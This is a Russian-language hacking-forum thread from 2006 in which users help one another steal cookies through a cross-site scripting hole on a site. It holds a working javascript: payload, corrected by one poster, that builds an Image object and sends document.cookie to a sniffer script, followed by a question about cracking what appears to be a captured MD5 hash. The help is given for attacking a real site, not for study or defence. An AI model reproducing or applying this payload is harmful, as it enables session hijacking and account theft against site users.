Вопрос про сниффер

Discussion in 'Песочница' started by Ponchik, 14 May 2006.

Thread Status:
Not open for further replies.
  1. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Всем привет! Прошу строго не судить! Я просто не понимаю как логически-верно составить код! Вот такое на сайте проходит
    HTML:
    javascript:alert('XSS')
    А вот подстроить под него античатовский сниффер немогу! Я думал надо
    HTML:
    javascript:img.src = "/cgi-bin/s.jpg?"+document.cookie;
    а не получилось... Помогите, а :confused:
    P.S.<script></script> тама не получается, надо как-то через javascript: это возможно?
     
    #1 Ponchik, 14 May 2006
    Last edited: 14 May 2006
  2. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    В хтмл смотрел во что преврошается <script></script> ?
     
    1 person likes this.
  3. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    <script>alert()</script> переплывает в alert() тоесть теги стираются
     
    #3 Ponchik, 14 May 2006
    Last edited: 14 May 2006
  4. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    Дело в том что у тебя в примере который ты дал ошибка. Для того чтоб сработала
    Code:
    javascript: img.src = "/cgi-bin/s.jpg?"+document.cookie;
    
    Тебе надо для начало создать обьект img.
    Т.е. так будет правильно:
    Code:
    javascript:[color=green]img=new Image();[/color]img.src= "/cgi-bin/s.jpg?"+document.cookie;
    
     
    1 person likes this.
  5. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    CinerX, РЕСПЕКТ И ОГРОМНОЕ СПАСИБО!!!!
    У меня вопрос... Это md5? 5cf88br3f7ddb3drdee78ecefr9e2aaa
     
    #5 Ponchik, 15 May 2006
    Last edited: 15 May 2006
  6. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,091
    Likes Received:
    671
    Reputations:
    591
    32 символов.МД5.Тема закрыта.
     
Thread Status:
Not open for further replies.